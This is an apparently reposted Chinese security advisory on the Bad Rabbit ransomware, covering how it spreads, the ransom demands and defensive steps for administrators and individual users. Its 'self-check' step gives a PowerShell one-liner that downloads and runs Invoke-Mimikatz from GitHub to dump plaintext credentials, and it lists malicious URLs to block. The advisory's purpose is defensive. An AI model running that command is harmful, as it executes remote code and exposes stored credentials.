事件背景
俄罗斯、乌克兰等国近日遭到新一轮勒索病毒攻击。乌克兰敖德萨国际机场、首都基辅的地铁支付系统及俄罗斯三家媒体相继中招,德国、土耳其等国随后也发现此病毒。
另外,据国家网络与信息安全信息通报中心消息称,已经有多个东欧国家因为该病毒致使200多家机构遭受不同程度的影响。目前,勒索病毒仍在持续蔓延,国内也很有可能会受到此病毒波及。
传播方式及过程
该病毒的传播开始是由一个虚假的Adobe flash 更新链接传播,当用户下载虚假的Adobe flash 更新包后,导致电脑文件被加密,同时释放Mimikatz提取密码、并在局域网进行弱口令扫描,成功获取SMB的密码后,进行登录并传播,再次注入Mimikatz病毒文件。
事件影响及后果
一旦计算机受到这种病毒感染,会一直扫描内网机器弱口令并传播该病毒,所有受感染机器中的文件会被病毒加密,导致受害者无法访问和使用被加密的文件和数据。同时定向到一个隐蔽网站,此网站会要求受害者支付0.05个比特币的赎金,赎金支付后才会给受害者机器解密。如果受攻击目标在40个小时之内没有支付赎金,黑客就会不断提高赎金的数额。该病毒会对所有受害者机器中数据产生严重威胁,目前尚未有正常的解密措施可以应对,一旦被此病毒感染后就会面临数据被挟持的风险,受感染严重的企业可能会导致业务瘫痪,品牌形象受到影响。
应对方式及建议
一.企业安全管理员应对方式
1.对内网机器进行全面检查、关闭设备共享功能;
2.自查AD域策略的的复杂度要求:
最短密码长度 8个字符,启用本机组策略中密码必须符合复杂性要求的策略。即密码至少包含以下四种类别的字符中的2种:
-
英语大写字母 A, B, C, … Z ;
-
英语小写字母 a, b, c, … z ;
-
西方阿拉伯数字 0, 1, 2, … 9 ;
-
非字母数字字符,如标点符号,@, #, $, %,等;
3.使用以下赛博星人提供的自检脚本命令检查杀毒软件能否识别和阻断坏兔子释放出来的恶意文件(如Minikatz):
打开CMD--执行Powershell--再执行powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 查看是否能看到该终端电脑的明文密码,如能看到明文密码则表示该设备会有受威胁的风险。
4.封杀目前已知的传染网址(后续可再增加);
-
caforssztxqzf2nm.onion
-
http://185.149.120.3/scholargoogle/
-
http://1dnscontrol.com/flash_install.php
-
1dnscontrol.com
5.防火墙关闭TCP 137、139、445端口;
6.禁用Windows系统下的管理控件WMI服务。
二、个人用户应对方式
1.升级防病毒软件(目前多数防病毒软件已经可以对该病毒进行查杀);
2.从官方渠道下载Adobe flash的更新包。
三、安全提升建议
1.信息安全体系架构提升
企业单位应该建立自身的信息安全体系架构,构成完整的信息安全防御体系,将安全问题、安全事件发生概率大幅度的减少甚至是规避,即使有安全问题发生也有信息安全体系作为应急支撑。
2.信息安全意识度提升
企业单位应该对员工的信息安全意识进行宣贯及培养,养成良好的习惯,做到全民参与信息安全工作中来,人人具备良好的信息安全意识,达到一定程度上减少信息安全事件发生几率的目的。
联系我们
本文始发于微信公众号(赛博星人):新型勒索病毒“坏兔子(Bad Rabbit)”应急响应通报及应对建议
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论